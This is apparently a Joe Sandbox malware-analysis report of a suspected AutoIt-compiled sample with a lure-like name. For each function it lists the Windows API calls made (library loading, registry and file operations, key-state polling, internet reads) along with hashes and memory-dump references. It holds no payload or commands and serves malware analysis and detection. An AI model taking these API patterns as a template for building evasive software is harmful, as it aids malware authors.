              • String ID: SysAnimate32
              • API String ID: 3529120543-1011021900
              • Opcode ID: 0b56119404695a5b5d45ad81eea0e450f3b694e63fe560751ff785383ff0637e
              • Instruction ID: a977f09629e694ca23ea40aca9893676d63a11df15510380bac3d603eedec3db
              • Opcode Fuzzy Hash: 0b56119404695a5b5d45ad81eea0e450f3b694e63fe560751ff785383ff0637e
              • Instruction Fuzzy Hash: D421DE71240A16BBEB208F64EDA0EFB37BAEB59364F100218F910D2290D771DC419B60
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005B4D1E,005C28E9,?,005B4CBE,005C28E9,006588B8,0000000C,005B4E15,005C28E9,00000002), ref: 005B4D8D
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005B4DA0
              • FreeLibrary.KERNEL32(00000000,?,?,?,005B4D1E,005C28E9,?,005B4CBE,005C28E9,006588B8,0000000C,005B4E15,005C28E9,00000002,00000000), ref: 005B4DC3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: 521b3490f0070a175797f88f0f9e7fd6d40a0032cd54ad0f1c53813fae720834
              • Instruction ID: 41157e08c17d7bcaad00c10099837af6fa9d938f488724028c0dab0322080484
              • Opcode Fuzzy Hash: 521b3490f0070a175797f88f0f9e7fd6d40a0032cd54ad0f1c53813fae720834
              • Instruction Fuzzy Hash: 4EF04F34A40608BFDB219F94DC49BEEBFBAEF44762F0040A4F805A22A1CB316955CED1
              APIs
              • LoadLibraryA.KERNEL32 ref: 005ED3AD
              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 005ED3BF
              • FreeLibrary.KERNEL32(00000000), ref: 005ED3E5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Library$AddressFreeLoadProc
              • String ID: GetSystemWow64DirectoryW$X64
              • API String ID: 145871493-2590602151
              • Opcode ID: b58e45c707b3324e1054785e418c01cbd50aecf9bf3ac8a2bd7e2ce6e23664b1
              • Instruction ID: 4c143202dea9d3d9fe341e1a69db6750cddb1a8c04d794b7ceb3d66d5988c941
              • Opcode Fuzzy Hash: b58e45c707b3324e1054785e418c01cbd50aecf9bf3ac8a2bd7e2ce6e23664b1
              • Instruction Fuzzy Hash: 9FF05C35805D608FC3389712CC5C91D3F35BF05701BA48855F982F6010DB30CC44C6B2
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00594EDD,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E9C
              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00594EAE
              • FreeLibrary.KERNEL32(00000000,?,?,00594EDD,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594EC0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Library$AddressFreeLoadProc
              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
              • API String ID: 145871493-3689287502
              • Opcode ID: 9bdd330a40bcd9bb14e29dba615567d34db1ce0cbf66314b285e753176056886
              • Instruction ID: 7de47f91a636e95e6df57bf437ef6cc30dd1a5d9341803cba2a4a9624e6b1581
              • Opcode Fuzzy Hash: 9bdd330a40bcd9bb14e29dba615567d34db1ce0cbf66314b285e753176056886
              • Instruction Fuzzy Hash: B9E08635A01D325BD7311725AC1DE5F695DBF81F73B050115FC01D2200DB60CD0788E2
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,005D3CDE,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E62
              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00594E74
              • FreeLibrary.KERNEL32(00000000,?,?,005D3CDE,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E87
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Library$AddressFreeLoadProc
              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
              • API String ID: 145871493-1355242751
              • Opcode ID: b24d0a3a025a1de636af186a0e731a7b105986df489ea47978fbf0fc3f35352e
              • Instruction ID: 9e9a8c200c825beeaeff022acbc51aa0d2e6433eaba154c7a59bea08c5f95424
              • Opcode Fuzzy Hash: b24d0a3a025a1de636af186a0e731a7b105986df489ea47978fbf0fc3f35352e
              • Instruction Fuzzy Hash: 3BD08C32902E31578A321B246C0DD8F2A1EBF85B623064110B800A2210CB24CD13C9D1
              APIs
              • GetCurrentProcessId.KERNEL32 ref: 0061A427
              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0061A435
              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0061A468
              • CloseHandle.KERNEL32(?), ref: 0061A63D
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Process$CloseCountersCurrentHandleOpen
              • String ID:
              • API String ID: 3488606520-0
              • Opcode ID: 0df555a2b05203119153b28c3ee1a91368b0b665c667dfa05756060948afa1eb
              • Instruction ID: 03f1a461038498c734cecf8846c996e7f227120e66b709301c6e384550146a10
              • Opcode Fuzzy Hash: 0df555a2b05203119153b28c3ee1a91368b0b665c667dfa05756060948afa1eb
              • Instruction Fuzzy Hash: 7FA181716043019FDB20DF24D886B6ABBE6BF88714F14885DF5599B3D2D770EC418B92
              APIs
              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00633700), ref: 005CBB91
              • WideCharToMultiByte.KERNEL32(00000000,00000000,0066121C,000000FF,00000000,0000003F,00000000,?,?), ref: 005CBC09
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00661270,000000FF,?,0000003F,00000000,?), ref: 005CBC36
              • _free.LIBCMT ref: 005CBB7F
                • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
              • _free.LIBCMT ref: 005CBD4B
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
              • String ID:
              • API String ID: 1286116820-0
              • Opcode ID: 999f89e5c05c87774a5b1b6837ee87a05df9b780dad3fd0504c88f00a4012a4d
              • Instruction ID: 08faabc989ea145c366a65d07ad32661968a3d30ddfc5de7109a3878bb3fba3a
              • Opcode Fuzzy Hash: 999f89e5c05c87774a5b1b6837ee87a05df9b780dad3fd0504c88f00a4012a4d
              • Instruction Fuzzy Hash: 2751E77190020A9FEB10DFE58C46E6EBFBDFB81720F14066EE514D7191DB705E418B51
              APIs
                • Part of subcall function 005FDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005FCF22,?), ref: 005FDDFD
                • Part of subcall function 005FDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005FCF22,?), ref: 005FDE16
                • Part of subcall function 005FE199: GetFileAttributesW.KERNEL32(?,005FCF95), ref: 005FE19A
              • lstrcmpiW.KERNEL32(?,?), ref: 005FE473
              • MoveFileW.KERNEL32(?,?), ref: 005FE4AC
              • _wcslen.LIBCMT ref: 005FE5EB
              • _wcslen.LIBCMT ref: 005FE603
              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 005FE650
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
              • String ID:
              • API String ID: 3183298772-0
              • Opcode ID: 4175f3291c9eca0cffbe1822d238e028c07871e9f085ed51a03c4899ecf649d2
              • Instruction ID: 0442cc9ae895ab270bfdf96c62341bada9f2cb5e3588533d26449c6b8e4bb169
              • Opcode Fuzzy Hash: 4175f3291c9eca0cffbe1822d238e028c07871e9f085ed51a03c4899ecf649d2
              • Instruction Fuzzy Hash: 175152B24087495BC724EB94DC859EF7BECBFC4340F00491EF689D3151EE79A5888766
              APIs
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                • Part of subcall function 0061C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061B6AE,?,?), ref: 0061C9B5
                • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061C9F1
                • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA68
                • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA9E
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061BAA5
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0061BB00
              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0061BB63
              • RegCloseKey.ADVAPI32(?,?), ref: 0061BBA6
              • RegCloseKey.ADVAPI32(00000000), ref: 0061BBB3
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
              • String ID:
              • API String ID: 826366716-0
              • Opcode ID: b9eacdf2451a05dc63a5cd9d622a179a049ae3f4de4e96578e287f6abceef1b7
              • Instruction ID: 5a5b2bb42ac8cf80f5439e7d8e9adc566b57454f5d5f92614037c750e230448d
              • Opcode Fuzzy Hash: b9eacdf2451a05dc63a5cd9d622a179a049ae3f4de4e96578e287f6abceef1b7
              • Instruction Fuzzy Hash: A761B631208241EFD714DF14C494EAABBE6FF84318F18955CF4994B2A2DB31ED45CB92
              APIs
              • VariantInit.OLEAUT32(?), ref: 005F8BCD
              • VariantClear.OLEAUT32 ref: 005F8C3E
              • VariantClear.OLEAUT32 ref: 005F8C9D
              • VariantClear.OLEAUT32(?), ref: 005F8D10
              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 005F8D3B
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Variant$Clear$ChangeInitType
              • String ID:
              • API String ID: 4136290138-0
              • Opcode ID: b26a372de3f0e562c45a580544565477ccf7d46ba17705abe72a8cc25226e931
              • Instruction ID: 329c1407ba8d5442b296f911493e81a11d1881a546508a0ae47551a0bdf18bf1
              • Opcode Fuzzy Hash: b26a372de3f0e562c45a580544565477ccf7d46ba17705abe72a8cc25226e931
              • Instruction Fuzzy Hash: FB517BB5A00619EFCB10CF68C884AAABBF9FF89310B158559FA05DB354E734E911CF90
              APIs
              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00608BAE
              • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00608BDA
              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00608C32
              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00608C57
              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00608C5F
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: PrivateProfile$SectionWrite$String
              • String ID:
              • API String ID: 2832842796-0
              • Opcode ID: 6331365a1150b981cde1fae151679c892385a53ff055168fe89b4ff997f15620
              • Instruction ID: 777867c581f4ba736c7313645a5dd693a2e8a396496d8db744e8695373bbb92b
              • Opcode Fuzzy Hash: 6331365a1150b981cde1fae151679c892385a53ff055168fe89b4ff997f15620
              • Instruction Fuzzy Hash: 0F513C35A00619DFDF15DF64C884AAEBBF5BF49314F088059E849AB3A2DB31ED51CB90
              APIs
              • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00618F40
              • GetProcAddress.KERNEL32(00000000,?), ref: 00618FD0
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00618FEC
              • GetProcAddress.KERNEL32(00000000,?), ref: 00619032
              • FreeLibrary.KERNEL32(00000000), ref: 00619052
                • Part of subcall function 005AF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00601043,?,7644E610), ref: 005AF6E6
                • Part of subcall function 005AF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,005EFA64,00000000,00000000,?,?,00601043,?,7644E610,?,005EFA64), ref: 005AF70D
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
              • String ID:
              • API String ID: 666041331-0
              • Opcode ID: 522bc0e3b56259b78053636e243898d8a18dfcefd277864452aa0f7b4110c79e
              • Instruction ID: 3227eb7bf93ce2069dd5ca52d89e59e8417c3a585b2761515ac94c25856e35b6
              • Opcode Fuzzy Hash: 522bc0e3b56259b78053636e243898d8a18dfcefd277864452aa0f7b4110c79e
              • Instruction Fuzzy Hash: 03512935604205DFDB15DF58C4988EDBBB2FF89364F098099E8069B362DB31ED86CB91
              APIs
              • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00626C33
              • SetWindowLongW.USER32(?,000000EC,?), ref: 00626C4A
              • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00626C73
              • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0060AB79,00000000,00000000), ref: 00626C98
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00626CC7
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$Long$MessageSendShow
              • String ID:
              • API String ID: 3688381893-0
              • Opcode ID: 2b3f5d365b8acc6e7d7fdc1f14e3d5e7154798a35fb4b6019586081576201538
              • Instruction ID: 8b092e2b85d9283e39c9b7ee07f8fe979cd9d6c35b79dbc5d9fdc0c2cc4ac2f2
              • Opcode Fuzzy Hash: 2b3f5d365b8acc6e7d7fdc1f14e3d5e7154798a35fb4b6019586081576201538
              • Instruction Fuzzy Hash: B241A035704924AFDB24AF28DC58FE97BA6EB09360F150268F895A73E0C371AD52CF50
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: f0f52b538e511925d7a5e43fe31554233d1ac3507564f1bb01359e45ff8cdd5c
              • Instruction ID: 761fc567f157e6591b206f604744b52883c381fc7b85b3fa9c6d4a49bbfbc484
              • Opcode Fuzzy Hash: f0f52b538e511925d7a5e43fe31554233d1ac3507564f1bb01359e45ff8cdd5c
              • Instruction Fuzzy Hash: A7417D76A002049FCB24DFA8C885A5DBBA5FF89714F1545ADE615EB292DA31AE01CB80
              APIs
              • GetCursorPos.USER32(?), ref: 005A9141
              • ScreenToClient.USER32(00000000,?), ref: 005A915E
              • GetAsyncKeyState.USER32(00000001), ref: 005A9183
              • GetAsyncKeyState.USER32(00000002), ref: 005A919D
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: AsyncState$ClientCursorScreen
              • String ID:
              • API String ID: 4210589936-0
              • Opcode ID: 394893c99e2ea3dfbdfffad96747f074295c63ad15e25a8daa9c5f91254f2243
              • Instruction ID: c1a3b6c3d1db82c713cc060a7196f117c6c316c89c572a6cbf2ba00ad91ca0d6
              • Opcode Fuzzy Hash: 394893c99e2ea3dfbdfffad96747f074295c63ad15e25a8daa9c5f91254f2243
              • Instruction Fuzzy Hash: D1417F31A0865BBBDF199F64C848BEEBB75FF0A324F208219E465A72D0C7346950CF91
              APIs
              • GetInputState.USER32 ref: 006038CB
              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00603922
              • TranslateMessage.USER32(?), ref: 0060394B
              • DispatchMessageW.USER32(?), ref: 00603955
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00603966
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
              • String ID:
              • API String ID: 2256411358-0
              • Opcode ID: 93da56a074b947c05a4d944dc83931175d0fa429edfb078a66d6f31ee2e02fc7
              • Instruction ID: 6dfc569d6ede0974bf803ca01b5773c7ea6f2d645cbe97af5aa9401bb950ac95
              • Opcode Fuzzy Hash: 93da56a074b947c05a4d944dc83931175d0fa429edfb078a66d6f31ee2e02fc7
              • Instruction Fuzzy Hash: 2E31E8709847519EEB39CB359808BF737AEAB02302F08056DD452963D0F3F49A85CB51
              APIs
              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0060CF38
              • InternetReadFile.WININET(?,00000000,?,?), ref: 0060CF6F
              • GetLastError.KERNEL32(?,00000000,?,?,?,0060C21E,00000000), ref: 0060CFB4
              • SetEvent.KERNEL32(?,?,00000000,?,?,?,0060C21E,00000000), ref: 0060CFC8
              • SetEvent.KERNEL32(?,?,00000000,?,?,?,0060C21E,00000000), ref: 0060CFF2
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
              • String ID:
              • API String ID: 3191363074-0
              • Opcode ID: d0379da02048daabda9a385960a9a5d0bf96865155258c49137f64ddef33e2f7
              • Instruction ID: 05db2b5fbaa89a3f8d1d1758f9e4db109ad6d2a41b7c97c0b7da58a01a7fc224
              • Opcode Fuzzy Hash: d0379da02048daabda9a385960a9a5d0bf96865155258c49137f64ddef33e2f7
              • Instruction Fuzzy Hash: BD315E71540606EFDB28DFA5C8849AFBBFAEF54364B10452EF506D2281DB30AE42DB61
              APIs
              • GetWindowRect.USER32(?,?), ref: 005F1915
              • PostMessageW.USER32(00000001,00000201,00000001), ref: 005F19C1
              • Sleep.KERNEL32(00000000,?,?,?), ref: 005F19C9
              • PostMessageW.USER32(00000001,00000202,00000000), ref: 005F19DA
              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 005F19E2
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
